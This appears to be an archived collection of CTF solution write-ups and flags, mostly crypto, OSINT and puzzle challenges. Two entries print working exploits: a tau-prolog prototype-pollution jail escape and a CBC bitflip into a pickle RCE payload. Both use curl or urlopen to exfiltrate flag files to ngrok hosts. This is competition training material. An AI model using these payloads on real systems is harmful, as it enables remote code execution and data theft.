Archived Challenges - January 2025

while you haven't solved the challenge

ictf{welcome_to,_probably,_the_only_square_year_you_will_ever_experience}

I'm sorry for all the prolog lovers - this is actually a node jail. Tau-prolog has a prototype pollution vulnerability in put_attr/3. (Source code). You can set any field for Object.prototype, but you can only set Term class as a value. By overriding opts.context_module, you can prepend any string to the next goal string. (Source code) To invoke the code, you also need to pollute other properties to make thread.session.modules[context_module].rules["term_expansion/2"] and thread.session.modules[context_module].rules["term_expansion/2"].length not undefined. You can use shell/1 to run any shell script, but you can't see the result. Use the curl command to get the content of flag.txt. Here's the full exploit.

cmd = `bash -c "curl https://tchenio.ngrok.io/$(cat flag*)"`

let q = `
:- use_module(library(os)).
`.replaceAll("\n", "").replaceAll("    ", "");
q = `consult(\\'${q}\\').`
q = `
put_attr(__proto__, context_module, '${q}%').
put_attr(__proto__, '${q}%', x).
put_attr(__proto__, rules, x).
put_attr(__proto__, modules, x).
put_attr(__proto__, 'term_expansion/2', x).
put_attr(__proto__, 'X', :-(:('${q}%',flag(X)),os:shell('${cmd}'))).
put_attr(__proto__, length, 3).
`.replaceAll("\n", "");
console.log(q)

ictf{tata-tautau-tatata-tautau-tatautatau!!!}

The real multiplication tables tend to be much more spread out, which kind of makes sense if you think about it. So, I used standard deviation.

from numpy import std
from Crypto.Util.number import long_to_bytes

with open('out.txt') as file:
    exec(file.read())

msg = ''
for a in ct:
    if std(a) > 0.00135:
        msg += '0'
    else:
        msg += '1'

print(long_to_bytes(int(msg, 2)))

ictf{sT4nD@rd_D3Via71oN}

https://cybersharing.net/s/b6d4f934a18a2ba77f6597bdeb21d98e

ictf{evil_moai_statuette_fans}

People have made tools to find md5 hashes with the most leading zeros possible, just repurpose them to find hashes that start with flag# and you should have something eventually. With 20 threads I found bonk_28160000003HNEIMNHNFNEIIJDJ in just over an hour. The program I used was https://github.com/EnesO226/md5zerofinder/tree/main

ictf{holy_smokes_i_won_the_jackpot}

from Crypto.Util.number import *
import ast
from sage.all import *
from tqdm import tqdm

with open("output.txt") as f:
    Primes = ast.literal_eval(f.readline())
    out = ast.literal_eval(f.readline())
res = ""
M = Matrix(ZZ, 65, 65)
for j in range(64):
    M[j, j] = 1
    M[j, -1] = Primes[j]
for i in tqdm(out, total=len(out)):
    M[64, -1] = i
    L = M.BKZ()
    if all(int(c) == 0 or int(c) == -1 for c in L[0]):
        res += "1"
    else:
        res += "0"
print(long_to_bytes(int(res, 2)))

ictf{dec1d3_my_fl4g_4nd_m9_b1ts_by_LLL_3ac4ed91}

This is just ascii art reversed. Easiest solve is to reverse it again, intended solve is to flip your monitor 😃

ictf{do_you_like_ascii_art}

https://cybersharing.net/s/02cd859b4cf7f72eda8f2649a35a9bd6

ictf{4n_Unkn0wn_lf5r_15_571ll_L1n34r}

Use ideas from Paillier / Okamoto-Uchiyama to recover A (mod p), run a couple of times + CRT to recover A. https://cybersharing.net/s/a6e0c8085ede425380260e43fadc2849

ictf{3l_P?y_K0ngr0o_0.571024}

https://cybersharing.net/s/889e583916e949bd107e1816f38b2d46

ictf{d1v150r5_0f_7h3_m1n1m4l_p0lyn0m14l}

This value of n has already been factored, you can use the database directly, https://factordb.com/ or input the parameters here https://www.dcode.fr/rsa-cipher

ictf{f4c70r1n6_15_h4rd_bu7_6006l1n6_15_345y}

https://cybersharing.net/s/225716f79ec593289f7bdc085a855df0

ictf{p1Ck3d_y0Ur_W@y_pa$7_th3_P1cKy_m0du1u5}

https://cybersharing.net/s/c63222bb78522a4f851c07cf032a6354

ictf{a_c@R3fU1lY_Cr4fT3d_PayL04d!}

I gave up on neat code by the way, the '5'*193 thing is to ensure a hash tag at the beginning https://cybersharing.net/s/6cfffbe9dffeba5dee52be0d5c8c4434

ictf{tH3_B1t$iz3_of_T#e_bi7S1Ze_0F_7hE_Pr1m3_15_d3cRE@s!n6_L1ne4RLy...}

Windows Defender always encrypts quarantined files with the same RC4 key you can find it here https://reversingfun.com/posts/how-to-extract-quarantine-files-from-windows-defender/ decrypt the file and claim the flag

ictf{7h3_0pp05173_0f_4_1_71m3_p4d}

Paper: Factoring with Cyclotomic Polynomials and its Code implementation

ictf{is_1t_s0lv4ble_if_q_is_2+p+p^2_1n5t34d1b591d9e}

upon registration the username is appended with a random string which can be checked against locally generated strings after bruteforcing the 8 bits seed, this therefore leaks the seed and you can predict slots to win prizes

ictf{r4nd0m_n0t_g4mbl3}

https://gist.github.com/icesfont/487d2838af9ade8a94da5ec8e3072273

ictf{nice_very_cool_:)}

PWT uses AES CBC mode. Hence, you can use CBC bitflip attack to inject at most 15 bits to the pickle payload.

pickle.dumps adds MEMOIZE opcode every time it pushes something. You can push the memoized value to stack with BINGET opcode.

import requests
from base64 import b64encode, b64decode
import pickle
from struct import pack

URL = "http://localhost:8000/"
EVIL = "https://xxx.ngrok.app/"

payload = (
    pickle.GLOBAL + b"os\nsystem\n" +
    pickle.BINGET + pack('b', 0) + 
    pickle.TUPLE1 +
    pickle.REDUCE + 
    b"\x01"
)
assert len(payload) <= 16
expected = (
    pickle.MEMOIZE +
    pickle.TUPLE2 +
    pickle.MEMOIZE +
    pickle.STOP +
    b"\x0c" * 0x0c
)

s = requests.session()

cmd = "cat /flag.txt"
code = f"python -c \"from urllib.request import urlopen;import os;urlopen('{EVIL}',data=os.popen('{cmd}').read().encode())\""
r = s.post(URL + "register", data={
    "username": code + " " * (16 - (len(code) % 16))
})
print(r.status_code)
print(r.text)
pkl = bytearray(b64decode(s.cookies["pkl"].encode()))

for i in range(len(payload)):
    pkl[i + (len(code)//16)*16 + 48] ^= expected[i] ^ payload[i]

del s.cookies["pkl"]
s.cookies["pkl"] = b64encode(pkl).decode()
r = s.get(URL)
print(r.status_code)
print(r.text)

ictf{m1Sc_X_W3b_X_cryPt0=P1CKL3}

Challenge is based around the fact that you can emulate integer arithmetic using only floating point arrithmetic, see http://tom7.org/papers/fluint.pdf for details

source code https://cybersharing.net/s/6f82023dcd6b5ae34a4f1aae5b08d678

ictf{d0_y0u_w47ch_5uck3rp1nch}

This is just a very silly way of implementing the Rabin-Karp string search algorithm. To reverse the hash just use chinese-remainder theorem. source and solve: https://cybersharing.net/s/0e2d857c996c62d865729b1f095846d7

ictf{BAABBAABBBABAAABAABAAAAABAAAAAAAABAABBBAABBABAAABAABAAAABBBBAABBBAABAABAAABAABAAAAABBAABABABABBAAAAAAABBAABBAAABAAAAABBAAABBBBAABBAAAABAABAAABBBAABBABAABAAABBBAAABABBAABBAABBBAABAAABABBABBBAABBABAABBAAABAABAABABAABBBABBAAABAABABABAABAAAABBBAAAAAAAABBABAAAABBABABAAAAAABABAABBAABABAABBBABAAABAABABAABBABBBABAAABBBAAA}

On the right side of the image there is a sign for a phone repair store with a phone number, google the number and you'll see that it's for a building in Albuquerque NM. Plug the address into maps and you'll see a nail and spa place across the street, and across from that is a Vietnamese bakery, whose address is the flag. Bonus points if you can find the time this photo was taken 😃

ictf{201_San_Pedro_Dr_SE_Suite_B1}